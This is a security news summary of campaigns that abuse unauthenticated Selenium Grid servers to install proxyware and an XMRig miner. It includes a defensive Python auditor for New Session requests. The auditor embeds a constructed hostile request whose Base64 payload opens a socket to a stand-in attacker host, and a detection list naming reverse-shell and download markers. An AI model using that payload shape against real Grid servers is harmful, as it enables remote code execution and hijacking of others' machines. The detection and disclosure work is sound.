
Selenium Grid Servers hacked for Crypto Mining and Proxyjacking



TLDR:

Internet-exposed Selenium Grid servers are being targeted for crypto mining and proxyjacking because a default Grid deployment has no authentication: anyone who can reach its HTTP endpoint can request a browser session and, through that request, control what the node executes. Cado Security researchers observed two separate campaigns using Selenium Grid instances to drop cryptocurrency miners and proxyware. Operators are advised to put authentication in front of the Grid.

Article Summary:

Internet-exposed Selenium Grid servers are under attack by threat actors running illicit cryptocurrency mining and proxyjacking campaigns. No software flaw is needed: Selenium Grid ships without authentication, so an exposed instance accepts browser-session requests from anyone, and those requests decide what the node launches. Cado Security researchers observed two distinct campaigns abusing this to deploy cryptocurrency miners and proxyware.

The first attack smuggles a Base64-encoded Python script in through the “goog:chromeOptions” capability (the Chrome-specific launch options a client supplies when requesting a new session). The script opens a reverse shell and runs a bash script that fetches IPRoyal Pawn and EarnFM. Both are proxyware: IPRoyal Pawn sells the host's internet bandwidth as a residential proxy, and EarnFM advertises passive income for sharing an internet connection; on a hijacked server it is the attacker, not the owner, who collects that income.
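As an added illustration (not code from the article or from Cado Security), the following Python audits a WebDriver New Session request body for the pattern described above: a goog:chromeOptions block whose binary points at an interpreter rather than a browser, or whose args carry a Base64 blob that decodes to socket or subprocess code. The two request bodies, the marker list, and the 198.51.100.10 address are constructed for the example; the request layout is the W3C WebDriver / ChromeDriver capabilities format.

```python
import base64
import json
import re

# Heuristics for this example only (not Selenium's or Cado's): a Chrome
# "binary" that is really an interpreter, and code-like strings, raw or
# Base64-encoded, in the launch arguments.
INTERPRETER_RE = re.compile(r"(^|/)(python[0-9.]*|perl|ruby|node|bash|dash|zsh|sh)$")
B64_CHUNK_RE = re.compile(r"[A-Za-z0-9+/]{40,}={0,2}")
CODE_MARKERS = ("socket", "subprocess", "os.dup2", "pty.spawn", "/dev/tcp/", "curl ", "wget ")


def capability_sets(body):
    """Yield each candidate capability dict from a New Session request.

    Handles the W3C layout (alwaysMatch merged with each firstMatch entry)
    and the legacy desiredCapabilities layout, since a Grid accepts both.
    """
    caps = body.get("capabilities") or {}
    always = caps.get("alwaysMatch") or {}
    for first in caps.get("firstMatch") or [{}]:
        merged = dict(always)
        merged.update(first)
        yield merged
    if "desiredCapabilities" in body:
        yield body["desiredCapabilities"]


def views_of(text):
    """Return the string itself plus the decoded text of any Base64 blob inside it."""
    views = [text]
    for match in B64_CHUNK_RE.finditer(text):
        try:
            views.append(base64.b64decode(match.group(0), validate=True).decode("utf-8", "replace"))
        except ValueError:  # binascii.Error is a ValueError: not real Base64, skip it
            pass
    return views


def code_marker_in(text):
    """First suspicious marker found in the raw or Base64-decoded argument, else None."""
    for view in views_of(text):
        for marker in CODE_MARKERS:
            if marker in view:
                return marker
    return None


def audit_new_session(body):
    """Return human-readable findings for one New Session request body."""
    findings = []
    for caps in capability_sets(body):
        opts = caps.get("goog:chromeOptions") or {}
        binary = opts.get("binary")
        if binary and INTERPRETER_RE.search(binary):
            findings.append(f"goog:chromeOptions.binary is an interpreter, not a browser: {binary}")
        for arg in opts.get("args") or []:
            marker = code_marker_in(arg)
            if marker:
                findings.append(f"goog:chromeOptions.args carries code ({marker!r}): {arg[:48]}...")
    return findings


# Constructed sample requests (not captured traffic). The second mimics the
# shape described above: an interpreter as the "browser" and a Base64 blob
# that decodes to socket/subprocess code. 198.51.100.10 is a TEST-NET address.
BENIGN_REQUEST = {
    "capabilities": {
        "alwaysMatch": {
            "browserName": "chrome",
            "goog:chromeOptions": {"args": ["--headless=new", "--window-size=1280,800"]},
        }
    }
}

_BLOB = base64.b64encode(
    b'import socket,subprocess,os;s=socket.socket();s.connect(("198.51.100.10",4444))'
).decode()
HOSTILE_REQUEST = {
    "capabilities": {
        "alwaysMatch": {
            "browserName": "chrome",
            "goog:chromeOptions": {
                "binary": "/usr/bin/python3",
                "args": ["-c", f"import base64;exec(base64.b64decode('{_BLOB}'))"],
            },
        }
    }
}

if __name__ == "__main__":
    for name, request in (("benign", BENIGN_REQUEST), ("hostile", HOSTILE_REQUEST)):
        print(name, json.dumps(audit_new_session(request), indent=2))
```

Run as a script it prints no findings for the benign request and two for the hostile one. The same function can be pointed at the JSON bodies a reverse proxy or the Grid's own request log records for POST /session, which is the cheapest place to catch this class of abuse on a Grid that cannot yet be put behind authentication.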

The second attack first checks the machine's CPU architecture and then drops a Golang-based ELF binary that attempts to escalate privileges and install an XMRig cryptocurrency miner. Both campaigns show how a misconfigured Selenium Grid instance becomes free compute and bandwidth for an attacker, and why authentication on these servers is not optional.

The campaign is a warning to organizations that run Selenium Grid for browser testing: an instance reachable from the internet without authentication will be found and used. Enabling authentication, and keeping the Grid off the public internet where that is possible, closes the door these miner and proxyware campaigns walk through.

